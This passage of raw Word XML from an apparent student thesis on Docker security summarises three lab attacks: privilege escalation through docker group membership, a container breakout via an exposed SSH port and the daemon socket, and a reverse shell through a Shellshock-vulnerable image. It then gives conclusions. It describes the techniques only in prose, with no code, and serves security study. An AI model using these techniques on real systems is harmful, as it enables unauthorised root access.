        <w:t xml:space="preserve">privilege escalation attack </w:t>
      </w:r>
      <w:r w:rsidR="00305B76">
        <w:t>on Docker containers.</w:t>
      </w:r>
      <w:r w:rsidR="00B553D5">
        <w:t xml:space="preserve"> The results </w:t>
      </w:r>
      <w:r w:rsidR="00D35B72">
        <w:t>showed that</w:t>
      </w:r>
      <w:r w:rsidR="007A0EAA">
        <w:t xml:space="preserve"> the attac</w:t>
      </w:r>
      <w:r w:rsidR="00C63041">
        <w:t>ker ha</w:t>
      </w:r>
      <w:r w:rsidR="006D209F">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00C63041">
        <w:t xml:space="preserve"> gained root privilege</w:t>
      </w:r>
      <w:r w:rsidR="004B158C">
        <w:t xml:space="preserve"> on the Docker host machine (Ubuntu Laptop)</w:t>
      </w:r>
      <w:r w:rsidR="004F3B94">
        <w:t xml:space="preserve"> without knowing the root password.</w:t>
      </w:r>
      <w:r w:rsidR="00082880">
        <w:t xml:space="preserve"> The attacker </w:t>
      </w:r>
      <w:r w:rsidR="00B713BB">
        <w:t xml:space="preserve">gained root privilege due to </w:t>
      </w:r>
      <w:r w:rsidR="00F05EE4">
        <w:t xml:space="preserve">becoming </w:t>
      </w:r>
      <w:r w:rsidR="000E6026">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="006D209F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F05EE4">
        <w:t xml:space="preserve">Docker group and </w:t>
      </w:r>
      <w:r w:rsidR="008C63C7">
        <w:t xml:space="preserve">running a container based on misconfigured </w:t>
      </w:r>
      <w:r w:rsidR="0084653E">
        <w:t>Docker image.</w:t>
      </w:r>
      <w:r w:rsidR="00F63C39">
        <w:t xml:space="preserve"> This </w:t>
      </w:r>
      <w:r w:rsidR="00495C77">
        <w:t xml:space="preserve">vulnerable Docker image enabled the </w:t>
      </w:r>
      <w:r w:rsidR="00D012AA">
        <w:t>attacker to escape his privilege to root.</w:t>
      </w:r>
      <w:r w:rsidR="000A5E3C">
        <w:t xml:space="preserve"> Therefore, this attack has proven to be successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750C2E86" w14:textId="2CB11B98" w:rsidR="00360200" w:rsidRDefault="00360200" w:rsidP="00172214">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="005A32D7">
        <w:t xml:space="preserve">second attack </w:t>
      </w:r>
      <w:r w:rsidR="006C23B5">
        <w:t>aimed</w:t>
      </w:r>
      <w:r w:rsidR="005A32D7">
        <w:t xml:space="preserve"> to exam</w:t>
      </w:r>
      <w:r w:rsidR="003A51EB">
        <w:t xml:space="preserve">ine </w:t>
      </w:r>
      <w:r w:rsidR="00E651F8">
        <w:t xml:space="preserve">Docker security for </w:t>
      </w:r>
      <w:r w:rsidR="006C23B5">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00E651F8">
        <w:t>container to host attack</w:t>
      </w:r>
      <w:r w:rsidR="00A37E92">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0066292F">
        <w:t xml:space="preserve"> One container was created</w:t>
      </w:r>
      <w:r w:rsidR="00640146">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="0066292F">
        <w:t>exposing port 22</w:t>
      </w:r>
      <w:r w:rsidR="00640146">
        <w:t xml:space="preserve"> to outsiders.</w:t>
      </w:r>
      <w:r w:rsidR="00D5574B">
        <w:t xml:space="preserve"> The author </w:t>
      </w:r>
      <w:r w:rsidR="004C30BE">
        <w:t>exploits th</w:t>
      </w:r>
      <w:r w:rsidR="001A6A0C">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="004C30BE">
        <w:t xml:space="preserve"> exposed port</w:t>
      </w:r>
      <w:r w:rsidR="00F958C0">
        <w:t>, gaining access to other containers</w:t>
      </w:r>
      <w:r w:rsidR="00672949">
        <w:t xml:space="preserve"> connected to the same network bridge.</w:t>
      </w:r>
      <w:r w:rsidR="001A6A0C">
        <w:t xml:space="preserve"> Further, the author abused the Docker daemon socket to </w:t>
      </w:r>
      <w:r w:rsidR="002F7804">
        <w:t xml:space="preserve">access the host’s </w:t>
      </w:r>
      <w:r w:rsidR="00861624">
        <w:t>file system</w:t>
      </w:r>
      <w:r w:rsidR="00B707F1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003E5214">
        <w:t xml:space="preserve"> The</w:t>
      </w:r>
      <w:r w:rsidR="00623CFA">
        <w:t xml:space="preserve"> author </w:t>
      </w:r>
      <w:r w:rsidR="007A58BB">
        <w:t>escaped to the Docker host</w:t>
      </w:r>
      <w:r w:rsidR="004E7877">
        <w:t xml:space="preserve">, exploiting the exposed port and abusing the </w:t>
      </w:r>
      <w:r w:rsidR="00D3466E">
        <w:t>daemon socket</w:t>
      </w:r>
      <w:r w:rsidR="005B3253">
        <w:t>. Thus</w:t>
      </w:r>
      <w:r w:rsidR="00835D47">
        <w:t>, the experiment of this attack was completed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217C645F" w14:textId="7940C704" w:rsidR="001C17E4" w:rsidRDefault="007C3184" w:rsidP="00172214">
      <w:r>
        <w:t xml:space="preserve">The last attack </w:t>
      </w:r>
      <w:r w:rsidR="00CC4FA2">
        <w:t>was conducted to demonstrate how attackers can</w:t>
      </w:r>
      <w:r w:rsidR="000C55B2">
        <w:t xml:space="preserve"> abuse </w:t>
      </w:r>
      <w:r w:rsidR="00A72E70">
        <w:t xml:space="preserve">containers </w:t>
      </w:r>
      <w:r w:rsidR="003E4956">
        <w:t xml:space="preserve">running </w:t>
      </w:r>
      <w:r w:rsidR="00A72E70">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidR="00A6383E">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00A72E70">
        <w:t>vulnerable application</w:t>
      </w:r>
      <w:r w:rsidR="00F003A2">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F66A8D">
        <w:t xml:space="preserve"> The application </w:t>
      </w:r>
      <w:r w:rsidR="00606EBD">
        <w:t xml:space="preserve">was </w:t>
      </w:r>
      <w:r w:rsidR="00133BD9">
        <w:t xml:space="preserve">pulled from </w:t>
      </w:r>
      <w:r w:rsidR="00D95EF5">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00133BD9">
        <w:t xml:space="preserve">Docker Hub and was </w:t>
      </w:r>
      <w:r w:rsidR="00606EBD">
        <w:t xml:space="preserve">vulnerable to shellshock attacks, meaning </w:t>
      </w:r>
      <w:r w:rsidR="0041467A">
        <w:t>the attacker</w:t>
      </w:r>
      <w:r w:rsidR="00E85EAB">
        <w:t xml:space="preserve"> can execute reverse shell attack on the</w:t>
      </w:r>
      <w:r w:rsidR="0041467A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00755226">
        <w:t>container where</w:t>
      </w:r>
      <w:r w:rsidR="00E85EAB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00755226">
        <w:t>the application is running</w:t>
      </w:r>
      <w:r w:rsidR="00127116">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00156E6C">
        <w:t xml:space="preserve"> As a result, the author managed to </w:t>
      </w:r>
      <w:r w:rsidR="002B4CF9">
        <w:t xml:space="preserve">get </w:t>
      </w:r>
      <w:r w:rsidR="002A0C9F">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="002B4CF9">
        <w:t xml:space="preserve">shell of the container </w:t>
      </w:r>
      <w:r w:rsidR="002A0C9F">
        <w:t xml:space="preserve">because of the </w:t>
      </w:r>
      <w:r w:rsidR="00DD0213">
        <w:t>application vulnerabilities. Thus, th</w:t>
      </w:r>
      <w:r w:rsidR="00C92900">
        <w:t xml:space="preserve">e outcome of this attack was </w:t>
      </w:r>
      <w:r w:rsidR="002D0437">
        <w:t>completed with success.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451FD43F" w14:textId="27A361CE" w:rsidR="00557275" w:rsidRDefault="00DD47B6" w:rsidP="00DD47B6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="153" w:name="_Toc86859305"/>
      <w:r>
        <w:t>SUMMARY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="153"/>
    </w:p>
    <w:p w14:paraId="41EBE63D" w14:textId="734D0034" w:rsidR="006441A2" w:rsidRDefault="006441A2" w:rsidP="006441A2">
      <w:r>
        <w:t xml:space="preserve">This chapter </w:t>
      </w:r>
      <w:r w:rsidR="006827A5">
        <w:t>analysed and discussed the r</w:t>
      </w:r>
      <w:r w:rsidR="00F534CA">
        <w:t>esults gathered from running the experiments.</w:t>
      </w:r>
      <w:r w:rsidR="00C42F79">
        <w:t xml:space="preserve"> The re</w:t>
      </w:r>
      <w:r w:rsidR="00DD35C1">
        <w:t xml:space="preserve">sults confirm that the </w:t>
      </w:r>
      <w:r w:rsidR="00F07B31">
        <w:t>attacks</w:t>
      </w:r>
      <w:r w:rsidR="00DD35C1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD1E30">
        <w:t>were completed with</w:t>
      </w:r>
      <w:r w:rsidR="00F07B31">
        <w:t xml:space="preserve"> success. The author believe</w:t>
      </w:r>
      <w:r w:rsidR="00F252B7">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00E86979">
        <w:t xml:space="preserve"> that </w:t>
      </w:r>
      <w:r w:rsidR="00FC0F84">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00E86979">
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="0096150D">
        <w:t>security aspect needs more work and improvement</w:t>
      </w:r>
      <w:r w:rsidR="0047584C">
        <w:t>, although it</w:t>
      </w:r>
      <w:r w:rsidR="002C191B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A08CD">
        <w:t xml:space="preserve">has </w:t>
      </w:r>
      <w:r w:rsidR="003753DC">
        <w:t xml:space="preserve">many </w:t>
      </w:r>
      <w:r w:rsidR="009A08CD">
        <w:t xml:space="preserve">advantages </w:t>
      </w:r>
      <w:r w:rsidR="009A08CD">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="003753DC">
        <w:t>benefits.</w:t>
      </w:r>
      <w:r w:rsidR="00F47A45">
        <w:t xml:space="preserve"> However, Do</w:t>
      </w:r>
      <w:r w:rsidR="00421B0D">
        <w:t xml:space="preserve">cker can be a reliable and trusted </w:t>
      </w:r>
      <w:r w:rsidR="00C47E7E">
        <w:t xml:space="preserve">containerization if used with </w:t>
      </w:r>
      <w:r w:rsidR="001D78A7">
        <w:t xml:space="preserve">prudence </w:t>
      </w:r>
      <w:r w:rsidR="001128E2">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00436FF7">
        <w:t xml:space="preserve"> applying </w:t>
      </w:r>
      <w:r w:rsidR="00F23D2E">
        <w:t>the remediation techniques discussed</w:t>
      </w:r>
      <w:r w:rsidR="00966B75">
        <w:t xml:space="preserve"> above.</w:t>
      </w:r>
      <w:r w:rsidR="00EC6435">
        <w:t xml:space="preserve"> Overall, the</w:t>
      </w:r>
      <w:r w:rsidR="00251363">
        <w:t xml:space="preserve"> attacks conducted </w:t>
      </w:r>
      <w:r w:rsidR="00992DDE">
        <w:t>hav</w:t>
      </w:r>
      <w:r w:rsidR="008C450F">
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r w:rsidR="004860A5">
        <w:t xml:space="preserve">outlined </w:t>
      </w:r>
      <w:r w:rsidR="007F0ACE">
        <w:t xml:space="preserve">and examined </w:t>
      </w:r>
      <w:r w:rsidR="004860A5">
        <w:t xml:space="preserve">the security </w:t>
      </w:r>
      <w:r w:rsidR="0022405A">
        <w:t xml:space="preserve">vulnerabilities </w:t>
      </w:r>
      <w:r w:rsidR="00083631">
        <w:t>that ex</w:t>
      </w:r>
      <w:r w:rsidR="00863705">
        <w:t>ist within the</w:t>
      </w:r>
      <w:r w:rsidR="0022405A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00681B4D">
        <w:t>Docker systems</w:t>
      </w:r>
      <w:r w:rsidR="00863705">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0DC16D" w14:textId="3FFD2412" w:rsidR="00863705" w:rsidRPr="006441A2" w:rsidRDefault="00863705" w:rsidP="006441A2">
      <w:r>
        <w:t>The next chapter will conclude the project</w:t>
      </w:r>
      <w:r w:rsidR="009059A9">
        <w:t xml:space="preserve"> along with </w:t>
      </w:r>
      <w:r>
        <w:t>recommendations for fu</w:t>
      </w:r>
      <w:r w:rsidR="009059A9">
        <w:t>ture</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009059A9">
        <w:t>study</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C9301C" w14:textId="77777777" w:rsidR="000E2251" w:rsidRPr="00172214" w:rsidRDefault="000E2251" w:rsidP="00172214"/>
    <w:p w14:paraId="491B185F" w14:textId="2F82BE9E" w:rsidR="000E2B73" w:rsidRDefault="000E2B73" w:rsidP="0052761F"/>
    <w:p w14:paraId="45D77F87" w14:textId="77777777" w:rsidR="000E2B73" w:rsidRPr="0052761F" w:rsidRDefault="000E2B73" w:rsidP="0052761F"/>
    <w:p w14:paraId="393ADD39" w14:textId="5C09647A" w:rsidR="00760DE9" w:rsidRPr="00F84650" w:rsidRDefault="00C50078" w:rsidP="005A3D1F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEAC54E" w14:textId="77777777" w:rsidR="002C4414" w:rsidRPr="002C4414" w:rsidRDefault="002C4414" w:rsidP="002C4414"/>
    <w:p w14:paraId="526E3924" w14:textId="77777777" w:rsidR="00284E90" w:rsidRPr="00284E90" w:rsidRDefault="00284E90" w:rsidP="00284E90"/>
    <w:p w14:paraId="3E39F2C4" w14:textId="77777777" w:rsidR="00AE09AC" w:rsidRDefault="00AE09AC" w:rsidP="00AE09AC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10F02A96" w14:textId="1D363968" w:rsidR="00646269" w:rsidRPr="00646269" w:rsidRDefault="00646269" w:rsidP="00646269"/>
    <w:p w14:paraId="40DFF41D" w14:textId="77777777" w:rsidR="00F4544E" w:rsidRPr="006344FA" w:rsidRDefault="00F4544E" w:rsidP="006344FA"/>
    <w:p w14:paraId="71B7C740" w14:textId="77777777" w:rsidR="0049245D" w:rsidRPr="0049245D" w:rsidRDefault="0049245D" w:rsidP="0049245D"/>
    <w:p w14:paraId="1731713A" w14:textId="77777777" w:rsidR="008D4AAB" w:rsidRDefault="008D4AAB" w:rsidP="006554BD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71BD3C3A" w14:textId="77777777" w:rsidR="006554BD" w:rsidRPr="005B46CB" w:rsidRDefault="006554BD" w:rsidP="006554BD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="010CF348" w14:textId="77777777" w:rsidR="0099797A" w:rsidRPr="0099797A" w:rsidRDefault="0099797A" w:rsidP="0099797A"/>
    <w:p w14:paraId="7267CB33" w14:textId="77777777" w:rsidR="00BF09F9" w:rsidRDefault="00BF09F9" w:rsidP="003E3388"/>
    <w:p w14:paraId="067D9190" w14:textId="77777777" w:rsidR="000A3056" w:rsidRPr="004453CF" w:rsidRDefault="000A3056" w:rsidP="004453CF"/>
    <w:p w14:paraId="03A6404B" w14:textId="77777777" w:rsidR="004453CF" w:rsidRPr="004453CF" w:rsidRDefault="004453CF" w:rsidP="004453CF"/>
    <w:p w14:paraId="7354A93D" w14:textId="77777777" w:rsidR="00885D13" w:rsidRDefault="00885D13" w:rsidP="00182BA5"/>
    <w:p w14:paraId="58DCC4D3" w14:textId="77777777" w:rsidR="00C0772B" w:rsidRPr="00C0772B" w:rsidRDefault="00C0772B" w:rsidP="00C0772B"/>
    <w:p w14:paraId="16968E8E" w14:textId="77777777" w:rsidR="00257C6C" w:rsidRPr="00257C6C" w:rsidRDefault="00257C6C" w:rsidP="00257C6C"/>
    <w:p w14:paraId="78476A4E" w14:textId="4AB1BA2F" w:rsidR="00CE5A27" w:rsidRDefault="00CE5A27" w:rsidP="00CE5A27"/>
    <w:p w14:paraId="1F408C6C" w14:textId="037BBD97" w:rsidR="00CD1685" w:rsidRDefault="009632C0" w:rsidP="00CD1685">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="154" w:name="_Toc86859306"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00A13BEC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CD1685">
        <w:t>CONCLUSIONS AND RECOMMENDATIONS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="154"/>
    </w:p>
    <w:p w14:paraId="49BDD42B" w14:textId="76313EDC" w:rsidR="00CD1685" w:rsidRDefault="00CD1685" w:rsidP="00CD1685">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="155" w:name="_Toc86859307"/>
      <w:r>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="155"/>
    </w:p>
    <w:p w14:paraId="5A4565B2" w14:textId="5884E923" w:rsidR="00CD1685" w:rsidRPr="00CD1685" w:rsidRDefault="007A540C" w:rsidP="00CD1685">
      <w:r>
        <w:t xml:space="preserve">This chapter discusses </w:t>
      </w:r>
      <w:r w:rsidR="007E08EE">
        <w:t>the fulfilment of the thesis</w:t>
      </w:r>
      <w:r w:rsidR="00205A24">
        <w:t>’s</w:t>
      </w:r>
      <w:r w:rsidR="007E08EE">
        <w:t xml:space="preserve"> research question mentioned in section 5</w:t>
      </w:r>
      <w:r w:rsidR="00205A24">
        <w:t>.1. The answers to the question are based on the findings from the experiment. In addition, this chapter includes some recommendations</w:t>
      </w:r>
      <w:r w:rsidR="00BE381A">
        <w:t xml:space="preserve"> for further research.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9EEFB2" w14:textId="7BFFBBBD" w:rsidR="00CD1685" w:rsidRDefault="00D015C1" w:rsidP="00CD1685">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="156" w:name="_Toc86859308"/>
      <w:r>
        <w:t>SUMMARY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="156"/>
    </w:p>
    <w:p w14:paraId="298EBB10" w14:textId="29864894" w:rsidR="005221CA" w:rsidRPr="00CD1685" w:rsidRDefault="00317F04" w:rsidP="00CD1685">
      <w:r>
        <w:t>The purpose of this project was to examine Docker containers security regarding misconfigured images and vulnerable applications.</w:t>
      </w:r>
      <w:r w:rsidR="008670D1">
        <w:t xml:space="preserve"> The project involved three attacks, including privilege escalation, container breakout, and using </w:t>
      </w:r>
      <w:r w:rsidR="00827F89">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="008670D1">
        <w:t>vulnerable application to assess Docker systems</w:t>
      </w:r>
      <w:r w:rsidR="00827F89">
        <w:t>’ security</w:t>
      </w:r>
      <w:r w:rsidR="008670D1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000D28E9">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="005221CA">
        <w:t xml:space="preserve">author has conducted background research and literature review to </w:t>
      </w:r>
      <w:r w:rsidR="00A860E4">
        <w:t>gain</w:t>
      </w:r>
      <w:r w:rsidR="005221CA">
        <w:t xml:space="preserve"> a greater understanding and knowledge </w:t>
      </w:r>
      <w:r w:rsidR="00A860E4">
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="005221CA">
        <w:t xml:space="preserve"> Docker ecosystems, specifically its security aspects.</w:t>
      </w:r>
      <w:r w:rsidR="00A860E4">
        <w:t xml:space="preserve"> This knowledge was </w:t>
      </w:r>
      <w:r w:rsidR="00B06D15">
        <w:t xml:space="preserve">applied </w:t>
      </w:r>
      <w:r w:rsidR="00A860E4">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00B06D15">
        <w:t>design, develop, and implement the security attacks</w:t>
      </w:r>
      <w:r w:rsidR="007C5610">
        <w:t xml:space="preserve"> in order</w:t>
      </w:r>
      <w:r w:rsidR="00B06D15">
        <w:t xml:space="preserve"> to achieve this project’s aims and objectives.</w:t>
      </w:r>
      <w:r w:rsidR="003D5B98">
        <w:t xml:space="preserve"> The findings and outcomes from the experiments show that the attacks were completed effectively, and the author believes that Docker technology requires more work on its security side.</w:t>
      </w:r>
      <w:r w:rsidR="00D015C1">
        <w:t xml:space="preserve"> In particular, allowing users to control the Docker daemon can </w:t>
      </w:r>
      <w:r w:rsidR="004D0FCC">
        <w:t>have negative impact on Docker security and its surroundings</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1256020504"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00C4078A">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C4078A">
            <w:instrText xml:space="preserve"> CITATION doc212 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C4078A">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[35]</w:t>
          </w:r>
          <w:r w:rsidR="00C4078A">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="004D0FCC">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53360D1F" w14:textId="1ACEC08A" w:rsidR="00CD1685" w:rsidRDefault="00D015C1" w:rsidP="00CD1685">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="157" w:name="_Toc86859309"/>
      <w:r>
        <w:t>CONCLUSION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="157"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423C5319" w14:textId="3AC10BD3" w:rsidR="00F6416C" w:rsidRDefault="00604972" w:rsidP="00E84EBF">
      <w:r>
        <w:t xml:space="preserve">Docker has become the most prominent technology in the containerization industry as it eases and </w:t>
      </w:r>
      <w:r w:rsidR="00314FE7">
        <w:t>accelerate</w:t>
      </w:r>
      <w:r w:rsidR="00DE1770">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the deployment</w:t>
      </w:r>
      <w:r w:rsidR="00314FE7">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00314FE7">
        <w:t>istribution, and delivery of applications across enterprise systems</w:t>
      </w:r>
      <w:r w:rsidR="00F54143">
        <w:t xml:space="preserve"> and the cloud</w:t>
      </w:r>
      <w:r w:rsidR="00314FE7">
        <w:t xml:space="preserve">. However, </w:t>
      </w:r>
      <w:r w:rsidR="00F54143">
        <w:t>Docker</w:t>
      </w:r>
      <w:r w:rsidR="00314FE7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0018762B">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00314FE7">
        <w:t>a recent technology</w:t>
      </w:r>
      <w:r w:rsidR="00FC5983">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidR="00314FE7">
        <w:t>thus</w:t>
      </w:r>
      <w:r w:rsidR="00FC5983">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00314FE7">
        <w:t xml:space="preserve"> its security platform </w:t>
      </w:r>
      <w:r w:rsidR="00FC5983">
        <w:t>demands</w:t>
      </w:r>
      <w:r w:rsidR="00314FE7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC5983">
        <w:t>probes</w:t>
      </w:r>
      <w:r w:rsidR="00314FE7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F54143">
        <w:t xml:space="preserve">for vulnerabilities and exploits to </w:t>
      </w:r>
      <w:r w:rsidR="0018762B">
        <w:t>make industries and individuals aware</w:t>
      </w:r>
      <w:r w:rsidR="00FC5983">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="0018762B">
        <w:t>prevent further security attacks.</w:t>
      </w:r>
      <w:r w:rsidR="00F54143">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB2427">
        <w:t>In this project, the author investigated Docker security using three attacks involving- privilege escalation, container breakout, and a vulnerable application.</w:t>
      </w:r>
      <w:r w:rsidR="004A20E9">
        <w:t xml:space="preserve"> The author conducted a comprehensive </w:t>
      </w:r>
      <w:r w:rsidR="00F6416C">
        <w:t xml:space="preserve">background research and </w:t>
      </w:r>
      <w:r w:rsidR="004A20E9">
        <w:t xml:space="preserve">literature review </w:t>
      </w:r>
      <w:r w:rsidR="00BD617D">
        <w:t>to develop and implement the security attacks on the Docker environment.</w:t>
      </w:r>
      <w:r w:rsidR="00F6416C">
        <w:t xml:space="preserve"> The background research outlined Docker architecture</w:t>
      </w:r>
      <w:r w:rsidR="00DE1770">
        <w:t xml:space="preserve"> and its various components</w:t>
      </w:r>
      <w:r w:rsidR="00F6416C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00660B2F">
        <w:t xml:space="preserve"> Also, it provided the best security techniques of Docker and its main security threats and vulnerabilities.</w:t>
      </w:r>
      <w:r w:rsidR="00DE1770">
        <w:t xml:space="preserve"> The literature review evaluated previous works related to this project. The review show</w:t>
      </w:r>
      <w:r w:rsidR="004B64B6">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00DE1770">
        <w:t xml:space="preserve"> that Docker is more vulnerable to misconfigured images and privilege escalation attacks. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEF7BB1" w14:textId="32C3AB6F" w:rsidR="004B64B6" w:rsidRDefault="004B64B6" w:rsidP="00E84EBF">
      <w:r>
        <w:t>Further, a systematic methodology was developed</w:t>
      </w:r>
      <w:r w:rsidR="00CA0AB7">
        <w:t xml:space="preserve"> based on scientific approaches and methods. The methodology focuses mainly on how the author </w:t>
      </w:r>
      <w:r w:rsidR="001D6430">
        <w:t>would</w:t>
      </w:r>
      <w:r w:rsidR="00CA0AB7">
        <w:t xml:space="preserve"> collect and interpret </w:t>
      </w:r>
      <w:r w:rsidR="001D6430">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00CA0AB7">
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidR="001D6430">
        <w:t xml:space="preserve">. As </w:t>
      </w:r>
      <w:r w:rsidR="001D6430">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">previously mentioned, the project followed positivism and deductive approaches. The data was collected through observation, experiment, and research and presented in screenshots. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02903A42" w14:textId="7D8E5E30" w:rsidR="00481400" w:rsidRDefault="00F07778" w:rsidP="00E84EBF">
      <w:r>
        <w:t xml:space="preserve">For the experiment, the first two attacks </w:t>
      </w:r>
      <w:r w:rsidR="00B1190C">
        <w:t xml:space="preserve">have </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">leveraged scripts </w:t>
      </w:r>
      <w:r w:rsidR="0023492C">
        <w:t xml:space="preserve">of Dockerfiles </w:t>
      </w:r>
      <w:r>
        <w:t>written by the author</w:t>
      </w:r>
      <w:r w:rsidR="005C4FD3">
        <w:t xml:space="preserve"> for this project</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B1190C">
        <w:t>to conduct privilege escalation and container breakout attacks. In contrast, the last attack was based on a vulnerable application downloaded from the Docker Hub.</w:t>
      </w:r>
      <w:r w:rsidR="00350606">
        <w:t xml:space="preserve"> The experiment was conducted on a single laptop with Ubuntu version 20.04 and the latest Docker installed.</w:t>
      </w:r>
      <w:r w:rsidR="00275E11">
        <w:t xml:space="preserve"> Based on the results obtained from the three experiments, the author believes that Docker security has still a long way to reach maturity.</w:t>
      </w:r>
      <w:r w:rsidR="00481400">
        <w:t xml:space="preserve"> However, this does not mean that Docker is not </w:t>
      </w:r>
